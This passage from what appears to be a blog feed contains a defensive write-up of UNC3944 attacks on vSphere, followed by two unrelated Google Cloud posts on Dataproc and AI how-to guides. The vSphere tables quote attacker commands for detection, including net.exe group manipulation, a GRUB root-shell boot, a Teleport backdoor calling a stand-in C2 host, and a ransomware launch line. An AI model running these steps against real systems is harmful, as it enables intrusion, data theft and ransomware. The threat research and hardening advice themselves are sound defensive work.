- [BEHAVIOR] Alert on anomalous file access: Alert on a single user accessing an unusually high volume of disparate files or SharePoint sites, which is a strong indicator of the reconnaissance seen during UNC3944 activity.
- [CRITICAL BEHAVIOR] Monitor Tier 0 account activity: Any password reset on a Tier 0 account (Domain Admin, Enterprise Admin, vSphere) must be treated as a critical incident until proven otherwise.
Critical hardening and mitigation:
- [CRITICAL] Prohibit phone-based resets for privileged accounts: For all Tier 0 accounts, enforce a strict “no password resets over the phone” policy. These actions must require an in-person, multipart, or high-assurance identity verification process.
- Protect and monitor privileged AD groups: Treat these groups as Tier 0 assets: tightly control who can modify their membership and implement the high-fidelity alerting for any membership change (AD Event ID 4728/4732). This is critical as threat actors will use native tools like net.exe, often via remote protocols like WinRM, to perform this manipulation. Avoid using obvious, non-obfuscated names like “vSphere Admins” for security groups that grant high-level privileges
- Harden information stores: Implement data loss prevention (DLP) and data classification to identify and lock down sensitive IT documentation that could reveal high-value targets. Treat secrets vaults as Tier 0 assets with strict, least-privilege access policies.
- Restrict or monitor remote management tools: Limit the use of remote management protocols like WinRM and vSphere management APIs to authorized administrative subnets and dedicated PAWs. Log all remote commands for review and anomaly detection.

Table 2 displays threat actors actions in support of Active Directory escalation along with process and command-line data that an organization may use to detect this activity.

Process Name	Command Line	Tactic	Threat Actor’s Goal
explorer.EXE	“C:Program Files…WORDPAD.EXE” “10.100.20.55c$Usersj.doe…ACME Power DivisionDocumentsProcedure for Deploying ESXi…docx”	Reconnaissance	Threat actor, using a compromised user account, opens IT procedure documents to understand the vSphere environment and find target names.
explorer.EXE	“C:…NOTEPAD.EXE” prd-mgmt-srv02.acme-corp.localc$Usersadm-svc-vcenterDesktopESX HOST CLUSTER ISSUE.txt	Reconnaissance	Threat actor continues recon, opening files on a management server that likely contain names of systems, groups, or administrators.
wsmprovhost.exe	“C:…net.exe” group “ESX Admins”	Enumeration	Having found the group name, the threat actors use WinRM to remotely query the membership of the “ESX Admins” group to identify targets.
wsmprovhost.exe	“C:…net.exe” group “ESX Admins” ACME-CORPtemp-adm-bkdr /add	Manipulation	This is the key attack. The threat actor adds their controlled account (temp-adm-bkdr) to the “ESX Admins” group, granting it full admin rights to vSphere.
wsmprovhost.exe	“C:…net.exe” group “ESX Admins”	Verification	The threat actor queries the group again immediately after the modification to confirm that their malicious user was successfully added.

Table 2: Active Directory user escalation

Phase 2: The Pivot to vCenter — The Control Plane Compromise

With mapped Active Directory to vSphere credentials, the threat actors turn their sights on the heart of the virtual environment.

The tactic: They use the compromised credentials to log into the vSphere vCenter Server GUI. From there, they leverage their vCenter Admin rights to gain what amounts to “virtual physical access” to the VCSA itself. They open a remote console, reboot the appliance, and edit the GRUB bootloader to start with a root shell (init=/bin/bash), giving them passwordless root access. They then change the root password to enable SSH access upon reboot. To maintain their foothold, they upload and execute teleport, a legitimate open source remote access tool, to create a persistent and encrypted reverse shell (C2 channel) that bypasses most firewall egress rules.
Why it’s effective: vCenter’s delegation of trust in Active Directory often via LDAP(S) means the initial login isn’t protected by MFA. The VCSA takeover abuses a fundamental privilege of a virtual environment administrator—the ability to interact with a VM’s console pre-boot.
Key detection signals:
- [LOGS] Monitor vCenter events for logins (com.vSphere.vc.UserLoginSessionLoginSuccessEvent) (com.vSphere.vc.UserLoginSessionLoginFailureEvent) and reboot (com.vSphere.vc.appliance.ApplianceRebootEvent).
- [LOGS] Monitor for log entries with prefixes like “SSH” in remote VCSA syslog to detect dropped SSH attempts or other blocked traffic via iptables.
- [LOGS] On the VCSA, monitor journald and implement VCSA remote forwarding of logs to a SIEM to detect unauthorized shell access and the enablement of the SSH and Shell service.

Figure 7: Remote syslog events for enablement of VCSA SSH service

- [NETWORK] Use Network Flow Logs to spot anomalous outbound connections from the VCSA’s IP address.
- [NETWORK] Unusual DNS Requests from vCenter – This detection identifies when a vSphere vCenter server makes DNS requests for domains that are not on the explicit allow list of known, trusted sites (e.g., vSphere.com, ntp.org, or internal domains).
- [LOGS] Use of cURL or Wget to download tools: This detection can identify the use of command-line utilities like cURL or Wget on a critical server (such as a vCenter, Domain Controller, or database server) to download a file from an external URL.
Critical hardening and mitigation:
- [CRITICAL] Enable the VCSA remote logging: Implement remote syslog forwarding on the VCSA appliance.
- [CRITICAL] Enforce phishing-resistant MFA on vCenter: Implement a phishing-resistant MFA solution, such as FIDO2/WebAuthn, for all vCenter logins by federating authentication with a supported identity provider. This is a critical control that directly neutralizes the threat of credential theft, rendering phishing attacks against vCenter users ineffective.
- [CRITICAL] Enforce least privilege in vCenter: Strictly limit the use of the Administrator role, reserving it for dedicated “break glass” accounts only such as administrator@vsphere.local. Instead, create granular, custom roles for specific job functions to ensure users and groups only have the minimum permissions necessary, breaking the link between a compromised AD account and a full vCenter takeover.
- [CRITICAL] Use the VCSA firewall and block shell access: Block all unnecessary outbound internet traffic from the VCSA using egress filtering and its built-in firewall. Disable the SSH and BASH shells by default. This thwarts the teleport backdoor and makes the VCSA takeover significantly more difficult.
- [CRITICAL] Configure the VCSA’s underlying iptables firewall: Enforce a Zero Trust allow-list for all management interfaces (443, 5480, 22) and enable logging for all denied connections. The default VCSA GUI firewall can be disabled by an attacker with a compromised web session and, crucially, it does not log blocked connection attempts. By configuring iptables at the OS level, the rules become immune to GUI tampering, and every denied connection is logged and forwarded to your SIEM.

Table 3 displays threat actor actions in support of Teleport Installation along with key evidence that an organization may use to detect this activity.

Tactic	Key Evidence	Threat Actor’s Goal
Execute Script & Assert Privileges	sudo: root : … COMMAND=/usr/bin/bash -c ‘#!/bin/bash…’ assert_running_as_root()	The threat actor executes the installer via sudo. The script’s first action is to confirm it has the root permissions required for system-wide installation.
Define Installation Parameters	`SCRIPT_NAME="teleport-installer"` `TELEPORT_BINARY_DIR="/usr/local/bin"` `TELEPORT_CONFIG_PATH="/etc/teleport.yaml"`	The script defines its core parameters, including where the backdoor’s binaries and configuration files will be placed on the compromised VCSA’s filesystem.
Hardcode C2 & Authentication Details	`TARGET_HOSTNAME='c2.attacker.net'` `JOIN_TOKEN='[REDACTED_JOIN_TOKEN]'` `CA_PIN_HASHES='sha256:[REDACTED_CA_PIN_HASH]`	The threat actor embeds the unique, pre-generated credentials required for the agent to connect and authenticate to their external command-and-control (C2) server
Detect OS & Select Package Type	`if [[ ${f} != "tarball" && ${f} != "deb" ...`	The script contains logic to detect the underlying operating system (e.g., Debian, RHEL, or a generic Linux like the VCSA) to ensure it uses the correct installation package (.deb, .rpm, or .tar.gz).
Download & Install Binaries	Script logic proceeds to download the ‘tarball’ package and unpacks binaries to `/usr/local/bin`	Based on the OS detection, the script would then download the appropriate Teleport package from an threat actor-controlled source and install the binaries (`teleport`, `tsh`, `tctl`) into the predefined directory.
Establish Persistence	`SYSTEMD_UNIT_PATH="/lib/systemd/ system/teleport.service"` [Implied Action] Script creates and enables a systemd unit file	To ensure the backdoor survives reboots, the script creates a systemd service file using the defined path. It then enables and starts the teleport service, which initiates the final, persistent connection to the C2 server.

Table 3: VCSA Teleport installation

Phase 3: The Hypervisor Heist — Offline Credential Theft and Exfiltration

This is where the threat actor leverages their vSphere control to operate beneath the notice of in-guest security and EDR.

The tactic: From vCenter, the threat actor enables SSH on the ESXi hosts and reset their root passwords. They then execute an offline attack by identifying a Domain Controller VM, powering it off, and detaching its virtual disk (.vmdk). This disk is then attached as a secondary drive to a forgotten or “orphaned” VM they control. From this unmonitored machine, they copy the NTDS.dit Active Directory database. The process is then reversed, and the DC is powered back on as if nothing happened. The stolen data is then moved in a two-stage process: first, an internal transfer from the orphaned VM to the compromised VCSA using sftp, and second, an external exfiltration from the VCSA through the already-established teleport C2 channel to a threat actor controlled cloud service.
Why it’s effective: This entire operation occurs at the hypervisor layer, making it invisible to any EDR or security agent running inside the Domain Controller’s operating system. The use of the VCSA as a data funnel bypasses any network segmentation rules.

Table 4 displays threat actor actions in support of VM data exfiltration along with key evidence that an organization may use to detect this activity.

Tactic	Evidence Source	Key Evidence	Threat Actor’s Goal
Identify Target VM	Browser History	URL: `https://vcsa-prod-01.acme.local/ui/...` Page Title: vSphere – ACME-DC01 – Datastores	The threat actor, logged in as a compromised user , browses the vSphere UI to locate the virtual machine for the target Domain Controller (ACME-DC01).
Identify Staging VM	Browser History	URL: `https://vcsa-prod-01.acme.local/ui/...` Page Title: vSphere – OLD-APPSRV-01 – Networks	The threat actor identifies a seemingly abandoned server (OLD-APPSRV-01) to use as their staging VM, onto which they will mount the DC’s disk.
Execute Disk Swap	vCenter Event Log	Event: `[vim.event.VmReconfiguredEvent]` `User: ACMEthreat.actor` `Action: Reconfigured OLD-APPSRV-01 on esxi-prod-02.acme.local`	The threat actor triggers a VM reconfiguration on the staging VM. This is the start of the disk attachment process.
Confirm Disk Attachment	vCenter Event Log	`Device Change: ...backing = (fileName = 'ds:///vmfs/volumes/.../ACME-DC01/ACME-DC01_4.vmdk' ...)`	The log shows a disk device being modified on the staging VM. The source file path clearly shows that the virtual disk (.vmdk) belonging to the Domain Controller (ACME-DC01) is being attached.
Confirm Host Execution	ESXi Host Log (hostd.log)	Task: `VpxaTask: VpxaReconfigVM /vmfs/volumes/.../OLD-APPSRV-01/OLD-APPSRV-01.vmx`	Simultaneously, the ESXi host logs the ReconfigVM_Task being executed against the staging VM, confirming the action was carried out at the hypervisor level.

Table 4: Virtual machine data exfiltration

Key detection signals:
- [BEHAVIOR] Monitor for reconnaissance in the vSphere UI: Before the attack, the threat actor browses the vSphere client to identify their target (e.g., a VM named ACME-DC01) and their staging VM (OLD-APPSRV-01). If UI access logs or browser histories from admin workstations are available, correlating suspicious browsing patterns with a subsequent reconfiguration event can provide very early warning.
- [LOGS] Scrutinize: As shown in this anonymised real-world example, a vim.event.VmReconfiguredEvent for the staging VM (e.g., OLD-APPSRV-01) will contain the file path of the target VM’s disk in its configuration details (e.g., backing = (fileName = '.../ACME-DC01/ACME-DC01_4.vmdk' ...)). Create high-priority alerts that parse this event data to detect when a disk from a critical asset is attached to any non-standard machine.
- [LOGS] Correlate the full event sequence: A high-fidelity alert can be built by correlating the full sequence of vCenter events on a critical asset: VmPoweredOffEvent, followed by the VmReconfiguredEvent previously detailed, and eventually a VmPoweredOnEvent combined with a restart initiated by vmtoolsd.exe, along with supporting Windows guest events like 6006 (shutdown) and 6005 (startup).
- [BEHAVIOR] Create CRITICAL alerts for any power-on or reconfiguration event on VMs located in a “Decommissioned” or “Orphaned” folder as these are prime candidates for the threat actors staging VM.
- [LOGS] Monitor ESXi host changes: Alert on SSH service start via vCenter events (vim.event.HostServiceStartedEvent), firewall configuration changes (vim.event.HostFirewallInfoChangedEvent), and direct root shell access logs on the ESXi hosts themselves.
Critical hardening and mitigation:
- [CRITICAL] Use vSphere VM encryption: Encrypt all Tier 0 virtualized assets. This is the definitive technical block for the offline “Disk Swap” attack as the stolen .vmdk file would be unreadable.
- [CRITICAL] Implement a strict VM decommissioning process: Formally decommission old VMs by deleting their disks. Do not leave powered-off, “orphaned” VMs on your datastores as these are the ideal workbenches for threat actors.
- [CRITICAL] Harden ESXi accounts: Disable the default ESXi root account in favor of a named “break glass” account with a highly complex password. On ESXi 8.0+, run esxcli system account set -i vpxuser -s false to prevent a compromised vCenter user from changing ESXi root passwords.
- [CRITICAL] Enable ESXi remote audit logging: Enable remote ESXi audit logging (vpxa.log, hostd.log, audit_records) to a SIEM to provide verbose, centralized details of security-focused events on the hosts themselves.

Figure 8: Remote syslog events for SSH access to ESXi

Phase 4: Backup Sabotage — Removing the Safety Net

Before deploying ransomware, the actor ensures their target cannot recover.

The tactic: Leveraging their full control over Active Directory, the threat actor targets the backup infrastructure (e.g., a virtualized backup server). They either reuse the compromised Domain Admin credentials to log in via RDP or, more stealthily, add a user they control to the “Veeam Administrators” security group in AD. Once in, they delete all backup jobs, snapshots, and repositories.
Why it’s effective: This works due to a lack of administrative tiering (where the same powerful accounts manage both virtualization and backups) and insufficient monitoring of changes to critical AD security groups.
Key detection signals:
- [Detecting Path A] Monitor for interactive logons (Windows Event ID 4624) on the backup server by high-privilege accounts.
- [Detecting Path B] Triggers a CRITICAL alert from AD logs for Event ID 4728 (“A member was added to a security-enabled global group”) for any change to the “Veeam Administrators” group
- [LOGS] Monitor the backup application’s own audit logs for mass deletion events.
Critical hardening and mitigation:
- [CRITICAL] Isolate backup infrastructure: The Veeam server and its repositories must be in a separate MFA protected, highly restricted security domain or use dedicated, non-AD-joined credentials. This severs the AD trust relationship the threat actor exploits.
- [CRITICAL] Utilize immutable repositories: This is the technical backstop against backup deletion. It makes the backup data undeletable for a set period, even if a threat actor gains full administrative access to the backup console.

Phase 5: Encryption — Ransomware from the Hypervisor

With the target blinded and their safety net gone, the final stage commences.

The tactic: The threat actor uses their SSH access to the ESXi hosts to push their custom ransomware binary via SCP/SFTP into a writable directory like /tmp. They then execute a script that uses the native ESXi command-line tool, vim-cmd, to forcibly power off every VM on the host. Finally, they launch the ransomware binary (often with nohup to ensure it continues after they log out), which scans the datastores and encrypts all VM files (.vmdk, .vmx, etc.).

Table 5 displays threat actor actions in support of ESXi ransomware execution along with key evidence that an organization may use to detect this activity.

Tactic	Source Log File	Key Evidence	Threat Actor’s Goal
SSH Login	/var/log/auth.log	`SSH session was opened for 'root@10.10.10.5'`	The Threat Actor logs in as root to the compromised ESXi host via an interactive SSH session.
Prepare Payload	/var/log/shell.log	`chmod 0777 encrypt.out` `cp encrypt.out encrypt_.out`	The Threat Actor’s commands to make the ransomware payload executable are captured by the ESXi shell log.
Create Exclusion List	/var/log/shell.log	`echo VCSA-01-PROD >> list.txt` `echo DC-01-PASSIVE >> list.txt`	The shell log records the creation of the list.txt file, revealing the threat actors intent to selectively encrypt systems.
Execute Ransomware	/var/log/shell.log	`nohup sh -c 'sleep 14400 && /encrypt_.out -pass [REDACTED_ENCRYPTION_KEY] -skip_vms /list.txt' &`	The exact command to launch the time-delayed ransomware, including the key and exclusion list, is logged. The nohup command ensures it runs after they log out.
Clean Up & Exit	/var/log/shell.log	`ls nohup.out` `exit`	The threat actors final commands and session termination are recorded before they exit, leaving the payload to run.

Table 5: ESXi ransomware execution

Why it’s effective: Root access on the ESXi shell is the highest level privilege in a virtual environment. By encrypting at the hypervisor level, they bypass all in-guest security and compromise servers with a single action.
Key detection signals:
- [NETWORK] Monitor Network Flow Logs for large file transfers to and from ESXi hosts over SSH/SCP.
- [BEHAVIOR] A SIEM alert for a high volume of VM power-off commands originating from a single ESXi host is a high-fidelity indicator of an ongoing attack.
- [LOGS] Monitor ESXi host logs for the execution of esxcli system settings kernel set -s execInstalledOnly -v FALSE (a threat actor attempting to disable a key defense) and mass vmsvc/power.off commands. Since this setting only applies after a reboot, correlate this alert with a subsequent host reboot within a short time window.
Critical hardening and mitigation:
- [CRITICAL] Enable vSphere lockdown mode: This is a primary prevention for this phase as it blocks the interactive SSH access needed to push and execute the payload.
- [CRITICAL] Enforce execInstalledOnly execution policy: This ESXi kernel setting is the definitive technical prevention. It blocks any unsigned binary from running, rendering the threat actor’s custom ransomware execution attempt to failure. Enable the hardware based TPM 2.0 chip with Secure Boot to lock this setting so it cannot be disabled.

The Three-Pillar Defense: A Fortified Strategy

Pillar 1: Proactive Hardening (Your Most Reliable Defense)

Architect for centralized access: Do not join ESXi hosts directly to Active Directory. Manage all host access exclusively through vCenter roles and permissions. This drastically reduces the attack surface.
Enable vSphere lockdown mode: This is a critical control that restricts ESXi management, blocking direct shell access via SSH and preventing changes from being made outside of vCenter.
Enforce execInstalledOnly: This powerful ESXi kernel setting prevents the execution of any binary that wasn’t installed as part of a signed, packaged vSphere Installation Bundle (VIB). It would have directly blocked the threat actor’s custom ransomware from running.
Use vSphere VM encryption: Encrypt your Tier 0 virtualized assets (DCs, PKI, etc.). This is the definitive technical block for the offline disk-swap attack, rendering any stolen disk files unreadable.
Practice strict infrastructure hygiene: Don’t just power off old VMs. Implement a strict decommissioning process that deletes their disks from the datastore or moves them to segregated archival storage to eliminate potential “staging” machines.
Posture management: It is vital to implement continuous vSphere posture Management (CPM) because hardening is not a one-time task, but a security state that must be constantly maintained against “configuration drift.” The UNC3944 playbook fundamentally relies on creating these policy deviations—such as enabling SSH or altering firewall rules. This can be achieved either through dedicated Hybrid Cloud Security Posture Management (CSPM) tools, such as the vSphere Aria Operations Compliance Pack, Wiz, or by developing custom in-house scripts that leverage the vSphere API via PowerShell/PowerCLI to regularly audit your environment.
Harden the help desk: For privileged accounts, mandate that MFA enrollment or password resets require an in-person, multipart, or high-assurance multi-factor verification process.

Pillar 2: Identity and Architectural Integrity (Breaking the Attack Chain)

Enforce phishing-resistant MFA everywhere: This must be applied to VPN, vCenter logins, and all privileged AD accounts. Use hardened PAWs with exclusive, firewalled access to the virtual center.
Isolate critical identity infrastructure: Run your Tier 0 assets (Domain Controllers, PAM, Veeam etc) in a dedicated, highly-secured “identity cluster” with its own stringent access policies, segregated from general-purpose workloads.
Avoid authentication loops: A critical architectural flaw is hosting identity providers (AD) recovery systems (Veeam) or privileged access management (PAM) on the very virtualization platform they secure and authenticate. A compromise of the underlying ESXi hosts results in a correlated failure of both the dependent services and the means to restore them, a scenario that significantly complicates or prevents disaster recovery.
Consider alternate identity providers (IdPs): To break the “AD-to-everything” chain, consider using a separate, cloud-native IdP like Azure Entra ID for authenticating to infrastructure.

Pillar 3: Advanced Detection and Recovery (Your Safety Net)

Build detections after hardening: The most effective alerts are those that detect the attempted manipulation of the hardening controls you’ve put in place. Harden first, then build your detection logic.
Centralize and monitor key logs: Forward all logs from AD, vCenter, ESXi, networking infrastructure, firewalls, and backups to a SIEM. Correlate logs from these disparate sources to create high-fidelity detection scenarios that can spot the threat actors’ methodical movements.
Focus on high-fidelity alerts: Prioritize alerting on events in phases 1-3. Detecting the enablement of SSH on a host, a VCSA takeover, or membership changes to your “Veeam Admins” group will enable you to act before data exfiltration and ransomware deployment.
Architect for survival: Assume the worst-case scenario. Your immutable and air-gapped backups are your last line of defense. They must be isolated from your production AD and inaccessible to a compromised administrator. Test your recovery plan against this specific threat model to ensure it works.

Conclusion: The Defender’s Mandate — Harden and Alert

UNC3944’s playbook requires a fundamental shift in defensive strategy, moving from EDR-based threat hunting to proactive, infrastructure-centric defense. This threat differs from traditional Windows ransomware in two ways: speed and stealth. While traditional actors may have a dwell time of days or even weeks for reconnaissance, UNC3944 operates with extreme velocity; the entire attack chain from initial access to data exfiltration and final ransomware deployment can occur in mere hours. This combination of speed and minimal forensic evidence makes it essential to not just identify but to immediately intercept suspicious behavioral patterns before they can escalate into a full-blown compromise.

This living-off-the-land (LotL) approach is so effective because the Virtual Center appliance and ESXi hypervisor cannot run traditional EDR agents, leaving a significant visibility gap at the virtualization layer. Consequently, sophisticated detection engineering within your SIEM becomes the primary and most essential method for active defense.

This reality presents the most vital key for defenders: the ability to detect and act on early alerting is paramount. An alert generated during the final ransomware execution is merely a notification of a successful takeover. In contrast, an alert that triggers when the threat actor first compromises a help desk account or accesses Virtual Center from an unusual location is an actionable starting point for an investigation—a crucial window of opportunity to evict the threat before they achieve complete administrative control.

A resilient defense, therefore, cannot rely on sifting through a sea of broad, noisy alerts. This reactive approach is particularly ineffective when, as is often the case, many vSphere environments are built upon a foundation of insecure defaults—such as overly permissive roles or enabled SSH—and suffer from a lack of centralized logging visibility from ESXi hosts and vCenter. Without the proper context from these systems, a security team is left blind to the threat actors’ methodical, LotL movements until it is far too late.

Instead, the strategy must be twofold. First, it requires proactive, defense-in-depth technical hardening to systematically correct these foundational gaps and reduce the attack surface. Second, this must be complemented by a deep analysis of the threat actor’s tactics, techniques, and procedures (TTPs) to build the high-fidelity correlation rules and logging infrastructure needed to spot their earliest movements. This means moving beyond single-event alerts and creating rules that connect the dots between a help desk ticket, a password reset in Active Directory, and a subsequent anomalous login to vCenter.

These two strategies are symbiotic, creating a system where defense enables detection. Robust hardening is not just a barrier, it also creates friction for the threat actor, forcing them to attempt actions that are inherently suspicious. For example, when Lockdown Mode is enabled (hardening), a threat actor’s attempt to open an SSH session to an ESXi host will fail, but it will also generate a specific, high-priority event. The control itself creates the clean signal that a properly configured SIEM is built to catch.

For any organization with a critical dependency on vSphere, this is not a theoretical exercise. What makes this threat exceptionally dangerous is its ability to render entire security strategies irrelevant. It circumvents traditional tiering models by attacking the underlying hypervisor that hosts all of your virtualized Tier 0 assets—including Domain Controllers, Certificate Authorities, and PAM solutions—rendering the logical separation of tiering completely ineffective. Simultaneously, By manipulating virtual disks while the VMs are offline, it subverts in-guest security solutions—such as EDR, antivirus (AV), DLP, and host-based intrusion prevention systems (HIPS)—as their agents cannot monitor for direct ESXi level changes.

The threat is immediate, and the attack chain is proven. Mandiant has observed that the successful hypervisor-level tactics leveraged by groups like UNC3944 are no longer exclusive; these same TTPs are now being actively adopted by other ransomware groups. This proliferation turns a specialized threat into a mainstream attack vector, making the time to act now.

Read More for the details.

2025 07 22

GCP – The Dataproc advantage: Advanced Spark features that will transform your analytics and AI

Tibor Kiss Cloud, Google Cloud gcp

With its exceptional price-performance, Google Cloud’s Dataproc has evolved from a simple, managed open-source software (OSS) service to a powerhouse in Apache Spark and open lakehouses, driving the analytics and AI workloads of many leading global enterprises. The recent launch of the Lightning Engine for Spark, a multi-layer optimization engine, makes Dataproc’s performance even more compelling.

But while performance is a cornerstone of the Dataproc offering, its capabilities go beyond that. To address contemporary enterprise requirements, we’ve invested in supporting open lakehouses, accelerating AI/ML workloads, fostering deeper integrations with BigQuery and Google Cloud Storage, and providing enterprise-grade security. In this post, we go into these advances, and how Dataproc is differentiated from on-premises and do-it-yourself configurations, or platforms from alternative cloud providers.

Open-source engines and open lakehouse

Whether you’re migrating from an existing on-prem data lake, cloud-based DIY clusters, or developing a multi-cloud strategy, Dataproc provides a feature-rich, and performant OSS stack, with strong compatibility and performance for open ecosystems. Some of the benefits in this regard include:

High performance: Currently in preview, the Lightning Engine Spark engine provides 3.6x better performance compared to open-source Apache Spark, thanks for traditional optimization techniques like query and execution optimizations, as well as optimizations in the file-system layer and connectors. It is fully compatible with open-source Apache Spark, and can plug into existing workloads running Dataproc on Google Compute Engine.

Optimized cost and efficiency: Native support for Spot VMs, intelligent autoscaling, and storage-aware optimizations reduce total cost of ownership. Recent enhancements to Dataproc autoscaling have shown to decrease cluster VM expenditures by up to 40% and to reduce cumulative job runtime by 10%, according to our evaluations.
Open lakehouse support: Out-of-the-box compatibility with leading open table formats, including Apache Iceberg, Delta Lake, and Apache Hudi. Dataproc offers improved lakehouse integration through catalog support, advanced optimizations, metadata caching, and comprehensive observability features.
Open Metastore integration: Support for BigLake Metastore, Iceberg Rest API compliant and Hive Metastore (HMS) compliant metastores help ensure an open and interoperable architecture. This enables you to work with your existing metastores easily, especially during migrations.

aside_block: <ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud data analytics’), (‘body’, <wagtail.rich_text.RichText object at 0x3e1edbacc940>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/bigquery/’), (‘image’, None)])]>

Optimizations across the storage layers

Spark with Cloud Storage

We’ve integrated Dataproc with Cloud Storage to optimize data access patterns and reduce costs. Key improvements include:

Smarter API retries: Rate-limit aware retry mechanisms help ensure resilient and efficient data access from Cloud Storage, even during periods of high demand.
Reduced metadata overhead: Optimized connectors significantly decrease the number of metadata calls to the Cloud Storage API, providing direct cost savings. The graph below shows the metadata optimizations of the Lightning Engine with Cloud Storage compared to open-source connectors.

Intelligent caching and prefetching: To enhance data retrieval efficiency from Cloud Storage, Dataproc integrates block-level caching and sub-query fusion. Additionally, scan bottlenecks are mitigated through the implementation of vectorized scans and the proactive pre-fetching of Parquet row groups.

Spark with BigQuery

Lightning Engine offers significant advantages in accessing data in BigQuery. Some of the important ones are:

Spark in BigQuery notebooks: You can now use multiple query engines on a single copy of data. You can author and interactively execute Spark code directly in BigQuery Studio notebooks. Write Spark SQL or PySpark code in the same notebook.
Accelerated, high-throughput connectivity: The optimized BigQuery connector for Spark utilizes the BigQuery Storage API for massively parallel reads, delivering up to 4x performance improvements over previous versions. The connector also reads data directly in the Apache Arrow format, eliminating costly serialization steps.
Intelligent query pushdown: Smart filter pushdown minimizes data movement by ensuring only necessary data is sent to the Spark cluster.
Unified data discovery: By using BigLake metastore as a federated Spark metastore, BigQuery tables become instantly discoverable in your Dataproc Spark environment, creating a unified analytics experience.

The below graph shows the performance improvements of Lightning Engine with Big Query compared to the open-source Spark with BQ connector.

AI/ML features

Dataproc streamlines the path from large-scale data processing to impactful AI and machine learning outcomes, lowering the barrier to entry for onboarding AI workloads. It provides a flexible and powerful environment where data scientists can focus on model development, not infrastructure management. Key advantages include:

Zero-scale clusters: Accelerate data analysis and notebook jobs without the overhead of maintaining traditional, long-running clusters. Zero-scale clusters let you scale down your worker nodes to zero.
Library management: AI/ML engineers frequently try new libraries for AI/ML development. We introduced a simple addArtifacts method to Dataproc to dynamically add PyPI packages to your Spark session. This installs specified packages and their dependencies in the Spark environment, making them available to workers for your UDFs.
Accelerated, GPU-powered ML: Dataproc clusters can be provisioned with powerful NVIDIA GPUs. Our ML images come pre-configured with GPU drivers, Spark RAPIDS, CUDA, cuDNN, NCCL and ML libraries like XGBoost, PyTorch, tokenizers, transformers, and more to accelerate ML tasks out of the box.
A clear path to advanced AI: Dataproc’s deep integration with Vertex AI provides easy access to Google’s state-of-the-art models along with third-party and open-source models, enabling at-scale batch inference and other advanced MLOps workflows directly from Dataproc jobs.

Enterprise features and security

Dataproc is built on Google Cloud’s secure foundation and provides security and governance features designed for the most demanding enterprises.

Organization Policy/fleet management: Organization Policy offers centralized, programmatic control over resources. As an administrator, you can define policies with constraints that apply to Dataproc resources including Dataproc cluster operations, sizing and cost.
Granular access control and authentication: Dataproc integrates with Google Cloud’s Identity and Access Management (IAM). For even more fine-grained control, you can enable Kerberos for strong, centralized authentication within your cluster. Furthermore, personal authentication support allows you to configure clusters so that jobs and notebooks are run using the end user’s own credentials, enabling precise, user-level access control and auditing.
Proactive vulnerability management: We maintain a robust Common Vulnerabilities & Exposures (CVE) detection and patching process, regularly updating Dataproc images with the latest security patches. When a critical vulnerability is discovered, we release new image versions promptly, allowing you to easily recreate clusters with the patched version, minimizing vulnerability exposure.
Comprehensive audit logging and lineage: Dataproc, like all Google Cloud services, generates detailed Cloud Audit Logs for all administrative activities and data access events, providing a clear, immutable record of who did what, and when. For end-to-end governance, you can leverage Dataplex Universal Catalog to automatically discover, catalog, and track data lineage across all your data assets in Dataproc, BigQuery, and Cloud Storage, providing a holistic view for compliance and impact analysis.
Easy monitoring and AI-driven troubleshooting: Serverless Spark UI makes it easy to access all Spark metrics without requiring to set up a Persistent History Server, removing manual overhead. Google Cloud Assist uses the latest Gemini AI models to identify issues with your jobs and recommends fixes and optimizations.

Performance, plus innovation and productivity

The enhancements across performance, open-source support, tight integrations with Google services, security, and AI/ML give Dataproc a competitive advantage over other Spark offerings. By managing the underlying complexity, Dataproc allows you to focus on driving business value from data, not on solving infrastructure challenges and open-source concerns. Whether you are migrating from an on-prem Hadoop environment, DIY clusters on the cloud, building a cloud-native lakehouse, or onboarding a new AI workload, Dataproc provides the performance, security, and flexibility at competitive pricing to meet your goals.

To learn more about how Dataproc can accelerate your data strategy, explore the official documentation or contact our sales team to schedule a demo.

Read More for the details.

2025 07 22

GCP – 25+ top gen AI how-to guides for enterprise

Tibor Kiss Cloud, Google Cloud gcp

The best way to learn AI is by building. From finding quick ways to deploy open models to building complex, multi-agentic systems, it’s easy to feel overwhelmed by the sheer volume of resources out there.

To that end, we’ve compiled a living, curated collection of our 25+ favorite how-to guides for Google Cloud. This collection is split into four areas:

Faster model deployment: Create efficient CI/CD pipelines, deploy large models like Llama 3 on high-performance infrastructure, and use open models in Vertex AI Studio.
Building generative AI apps & multi-agentic systems: Build document summarizers, multi-turn chat apps, and advanced research agents with LangGraph.
Fine-tuning, evaluation, and Retrieval-Augmented Generation (RAG): Refine models with supervised fine-tuning, RAG, and Reinforcement Learning from Human Feedback (RLHF).
Integrations: Connect your AI to the world by building multilingual mobile chatbots or integrating with Google Cloud Databases.

Bookmark this page and check back often for our latest finds.

aside_block: <ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud AI and ML’), (‘body’, <wagtail.rich_text.RichText object at 0x3e1edc393ca0>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/vertex-ai/’), (‘image’, None)])]>

Faster model deployment

1. Build a CI/CD pipeline for your ML workflow. Automate the process of building, testing, and deploying a Vertex AI Pipeline by connecting a GitHub repo to Cloud Build triggers. Github repository.

2. Deploy large models like Llama 3 on high-performance A3 VMs. This guide provides the Terraform scripts to provision an AI Hypercomputer cluster (A3 VMs with GPUs) and deploy large open models using JAX for maximum performance. GitHub provisioning documentation.

3. Access DeepSeek models and Llama 4 models on AI Hypercomputer. This TPU recipe outlines the steps to deploy the Llama-4-Scout-17B-16E Model with JetStream MaxText Engine with Trillium TPU. You can deploy Llama4 Scout and Maverick models or DeepSeekV3/R1 models today using inference recipes from the AI Hypercomputer Github repository.

4. Use open models in Vertex AI Studio. Model selection isn’t limited to Gemini anymore–you can select Claude models, too. Here’s the documentation to use open models in Vertex AI Studio.

5. Build and deploy a remote MCP server to Google Cloud Run in under 10 minutes. Drawing directly from the official Cloud Run documentation for hosting MCP servers, this guide shows you the straightforward process of setting up your very own remote MCP server. Blog.

Building gen AI apps & multi-agentic systems

6. Create a document (text) summarizer with Gemini Pro. This Python notebook shows you how to use the Vertex AI SDK to interact with the Gemini Pro model for a practical task: generating a concise summary of a long document. Github recipe.

7. Build multi-turn chat applications with Gemini. This notebook demonstrates how to use the Gemini API to build a stateful, multi-turn chat service that can remember conversation history. Official documentation.

